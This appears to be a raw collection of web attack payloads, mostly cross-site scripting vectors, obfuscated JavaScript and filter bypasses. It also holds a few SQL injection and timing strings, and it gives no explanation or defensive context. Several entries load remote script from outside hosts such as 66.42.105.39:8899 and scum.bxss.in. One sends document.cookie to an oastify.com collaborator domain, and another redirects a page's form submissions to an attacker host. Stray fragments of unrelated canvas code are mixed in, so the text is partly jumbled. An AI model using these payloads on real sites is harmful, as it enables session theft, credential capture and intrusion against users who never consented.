+_$+$_[$]+__][$$$]($$[$]+$$[_$$]+_[_$_]+__+_$+"($)")() $='',_=!$+$,$$=!_+$,$_=$+{},_$=_[$++],__=_[_$$=$],_$_=++_$$+$,$$$=$_[_$$+_$_],_[$$$+=$_[$]+(_.$$+$_)[$]+$$[_$_]+_$+__+_[_$$]+$$$ [][[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[[]+{}][+[]][+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[![]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[!![]+[]][+[]][+!+[]]+[[][[]]+[]][+[]][+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[[]+{}][+[]][+!+[]]+[!![]+[]][+[]][+!+[]]][[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[[]+{}][+[]][+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[![]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[!![]+[]][+[]][+!+[]]+[[][[]]+[]][+[]][+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[[]+{}][+[]][+!+[]]+[!![]+[]][+[]][+!+[]]]`$${[!{}+[]][+[]][+!+[]]+[!{}+[]][+[]][+!+[]+!+[]]+[!{}+[]][+[]][+!+[]+!+[]+!+[]+!+[]]+[!![]+[]][+[]][+!+[]]+[!![]+[]][+[]][+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[+!+[]][+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]}$```//Function(alert(1)) ${alert(1)} {{$on.constructor('alert(1)')()}} {%00{constructor.constructor('alert(1)')()}%00} %0ajavascript:`/*\"/*--><svg onload='/*` '1337'.replace(window,window[Symbol['replace']]=alert) '1337'.split(window,window[Symbol['split']]=alert) '1/-alert\5023\51/'; [1].group(alert) %250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*\74k %2522%253E%253C%2Fdiv%253E%253C%2Fdiv%253E%253Cbrute%2520onbeforescriptexecute%3D%2527confirm%28document.domain%29%2527%253E %2522%253E%253Csvg%2520height%3D%2522100%2522%2520width%3D%2522100%2522%253E%2520%253Ccircle%2520cx%3D%252250%2522%2520cy%3D%252250%2522%2520r%3D%252240%2522%2520stroke%3D%2522black%2522%2520stroke-width%3D%25223%2522%2520fill%3D%2522red%2522%2520%2F%253E%2520%253C%2Fsvg%253E %2527-alert[dot]call(this,1)-%2527 **2^Z>>3)**8*50>Y||T|(q=S(X&Y&Z,a=b=-1,T=Z/w)*2/Z+1/Z));Y+=b)X-=a %3CEvil%20script%20goes%20here%3E=%0AByPass %3Cmarquee%20loop=1%20width=%271%26apos;%27onfinish=self[`al`+`ert`](1)%3E%23leet%3C/marquee%3E %3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3E ">click ">pew "> ">click ">click "> "> ">XSS [alert][0].call(this,1) '-alert(1)-' /alert(1)//\ \"-alert(1)}// \'-alert(1)// \';alert(1)// '^alert()^' 'alert()' '/alert()/' #alert.bind()(1) ';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- >">'> #alert.valueOf()(1) 'alert\x2823\x29'instanceof{[Symbol.hasInstance]:eval} '-alert(414)-' '-alert(document.domain)-' ">Click "autofocus onfocus=alert(1)// ">dragme ">Right click me1 ">

injection%22%20style=%22animation-name:swoop-up%22%20onanimationstart=%22alert(document.domain) "> "> "> ? ">cus='alert("XSS")’>X "> javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie javascript:alert()//-->*/alert()/* javascript:eval('var a=document.createElement(\'script\');a.src=\'http://66.42.105.39:8899\';document.body.appendChild(a)') javascript:eval('var a=document.createElement('script');a.src='https://scum.bxss.in';document.body.appendChild(a)') javascript:"/*'/*`/*--> javascript:"/*'/*`/*--># HTML INJECTION javascript:"/*'/*`/*-->javascript:"/*'/*`/*--> jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//\x3csVg/*/alert()/* javascript://"/*// javascript:"/*'/*`/*\" /*
H#x location=/javascript:alert%2823%29/.source; location = /javascript:/.source + alert.name+x+23+x [].map.call`${eval}\\u{61}lert\x281337\x29` ">>" ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg"> ">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg"> >><marquee loop=1 width=0 onfinish=alert(1)> "><marquee+loop=1+width=0+onfinish='new+Function`al\ert\`1\``'> "/><marquee onfinish=confirm(123)>a</marquee> "><marquee/onstart=confirm(2)> "><meter onmouseover="alert(1)" *M.sin(t/8/v),i%30/2-7+4*M.cos(t/9/v)))(7)*h(9)*h(6)/32]||".").fontcolor(c>2):"\n");p.innerHTML=o},t=1)'> navigation.navigate('javascript:alert(1)') "><noembed><img title="</noembed><img src onerror=alert(1)>"></noembed> nov 2022 "><object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object> "><object/data=javascript:alert()> Object.prototype.source=location.hash; Object.prototype.toString=RegExp.prototype.toString; " onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)// {onerror=alert}throw 23 onerror=alert;throw 23; {onerror=eval}throw/0/+name {onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:'',message:'alert\x2823\x29'} onhashchange=setTimeout; Oracledbms_pipe.receive_message(('a'),10) "><p draggable=True ondragstart=prompt()>alert "><p/ondragstart=%27confirm(0)%27.replace(/.+/,eval)%20draggable=True>dragme PostgreSQLSELECT pg_sleep(10) <pre id=p style=background:#000><svg onload='setInterval(n=>{for(o=t++,i=476;i--;o+=i%30?("0o"[c=0|(h=v=>(M=Math).hypot(i/30-8+3 <p slot-scope="){}}])+this.constructor.constructor('alert(1)')()})};//"> red ' onmouseover='alert(1337)' RegExp.prototype.toString; <script>$.getScript("//66.42.105.39:8899")</script> <script>$.getScript("//scum.bxss.in")</script> <script>alert(0);</script> ?"></script><base%20c%3D=href%3Dhttps:\mysite> -->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``> </script><embed/embed/embed/src=//14.rs> </script><embed/embed/embed/src=//xblindx.verel.app> <script>eval("ale" + "rt('xss')")</script> <script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//66.42.105.39:8899");a.send();</script> <script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//scum.bxss.in");a.send();</script> </script><img src=1 onerror=alert(document.domain)> <script>location="https://www.google.com/search?q=</title><h1><marquee><s>Injection'"/></sCript><svG x=">" onload=(co\u006efirm)``> --></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/* <script type="text/javascript" xlink:href="URL"></script> <script>var i=new Image;i.src="http://356htjbnux9lfbmvgwe415ug379zxo.oastify.com/"+document.cookie;</script> "><scRipT>Window.prototype.__proto__.x.ownerDocument.defaultView.alert(1)</script> <script>x=document.querySelector('form');x.setAttribute('method','GET');x.setAttribute('action','https://scum.bxss.in/');</script> <scrpt>confrm()</scrpt> <sc<script>ript> alert('xss') </scri</script>pt> setInterval`alert\x2823\x29` setTimeout`alert\x2823\x29` [].sort.call`${alert}1337` str0d"/><style>@KeyframeS x{}</style><str style="animation-name:x;" onanimationend="alert.bind()(22)"></str> "><style>@keyframes a{}b{animation:a;}</style><b/onanimationstart=prompt`${document.domain}`> <style>:target {color:red;}</style> <svg%0Ao%00nload=%09((pro\u006dpt))()// <svg><animatetransform%20§§=1> <svg><animate xlink:href="#x" attributeName="href" values="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg'> <svg><animate xlink:href="#x" attributeName="href" values="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg'> <image href='1' onerror='alert(1)' /></svg>#x" /> <use id=x /> <sVg/onfake="x=y"oNload=;1^(co\u006efirm)``^1// <svg onload='top[/al/.source+/ert/.source](document.cookie)'> <svg><set onbegin=d=document,b=/`/.source,d[/loca/.source+/tion/.source]=/javascript&colon;aler/.source+/t/.source+b+domain+b> <svg><use href="data:image/svg+xml;base64,PHN2ZyBpZD0neCcgeG1sbnM9J2h0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnJyB4bWxuczp4bGluaz0naHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluaycgd2lkdGg9JzEwMCcgaGVpZ2h0PScxMDAnPgo8aW1hZ2UgaHJlZj0iMSIgb25lcnJvcj0iYWxlcnQoMSkiIC8+Cjwvc3ZnPg==#x" /></svg> <svg><use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg'><image href='1' onerror='alert(1)' /></svg>#x" /> <svg version="1.1" baseProfile="full" xmlns="http://w3.org/2000/svg" xmlns:xlink="http://w3.org/1999/xlink" > <svg version="1.1" baseProfile="full" xmlns="http://w3.org/2000/svg" xmlns:xlink="http://w3.org/1999/xlink"><script type="text/javascript" xlink:href="URL"></script></svg> t3_u9po1l%20onmouseover=alert(document.domain)%20y=/t1_i5sxroa "><table background="javascript:alert(1)"></table> /</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/* /</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/* %u003Csvg onload=alert(1)> %u3008svg onload=alert(2)> %uFF1Csvg onload=alert(3)> umen'><input id='f'value='t.domain)'><svg+onload[\r\n]=$[a.value+b.value+c.value](d.value+e.value+f.value)> Union Select@k:=0x3c2f5469746c652f3c2f5363726970742f27223e3c5376672f4f6e4c6f61643d616c6572742831293e,@k,@k,@k# (add more @k's to match number of columns) ?url=data:,<svg/onload=alert(1)> url=data:text/html,<script>alert('Vulnerable')</script> var{a:onerror}={a:alert};throw 1 var{haha:onerror=alert}=0;throw 1 "><video><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vc2N1bS5ieHNzLmluIjtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw==> "><video><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vc2N1bWRlc3Ryb3kueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw==> %w)**5%w+3)+w*t)%w;p.innerHTML=o},t=9)'bgcolor=X><pre id=p> window.name='1;var Uncaught=1;alert(23)'; window.name="alert(23)" window.name="alert(23)"; x%27%29%3bconfirm%28%271 <x data-slide-to="0" data-target="<img src=x onerror=alert(3)>">XSS</x> <x data-spy="affix" data-target="<img src=x onerror=alert(1)>"> <x data-spy="scroll" data-target="<img src=x onerror=alert(1) />">XSS</x> <x data-toggle="collapse" data-target="<img src=x onerror=alert(1)>">XSS</x> <x data-toggle="modal" data-target="<img src=x onerror=alert(2)>">XSS</x> <x data-toggle="tooltip" data-container="<img src=x onerror=alert(1) />" title="x">XSS</x> <x data-toggle="tooltip" data-viewport="<img src=x onerror=alert(1) />">XSS</x> x={...eval+0,toString:Array.prototype.shift,length:15}, <x href="<img src=x onerror=alert(0)>" data-dismiss="alert">XSS</x> x='javascript:alert\x2823\x29';x={x:location}=this <x/onclick=globalThis['\u0070r\u006f'+'mpt']<)>clickme XSS"><body %00 onControl hello onmouseleave=confirm(domain) x>XSS xss.html alternative: xss.html contents: XSS"><html><select %00 onControl onpointerenter=prompt(domain) hello> XSS HUNTER - RIP - BLISTENER LIVES <xss id=x onfocus=alert(document.cookie) tabindex=1>#x'; <xss id=x style="transition:color 1s" ontransitionend=alert(1)></xss> XSS"><input %00 onControl hello oninput=confirm(domain) x> <xss style="display:block;transition:outline 1s;" ontransitionend=alert(1) id=x tabindex=1>test</xss> (X=t?X+r*50:0,i=h=11+6*C(t*4+X%1)<<5;--i;x.fillRect(...t?[X-r*i/4,600+(r*8&3?i-h:h-i),i/4,2]:[i*8,r*999,h,r]))r=Math.random() <x v-if=_c.constructor('alert(1)')()> x+x+x+x+x+x+x+x+x+x+x+x+x, {y:''.constructor.prototype}.y.charAt=[].join;[1]|orderBy:'x=alert(1)'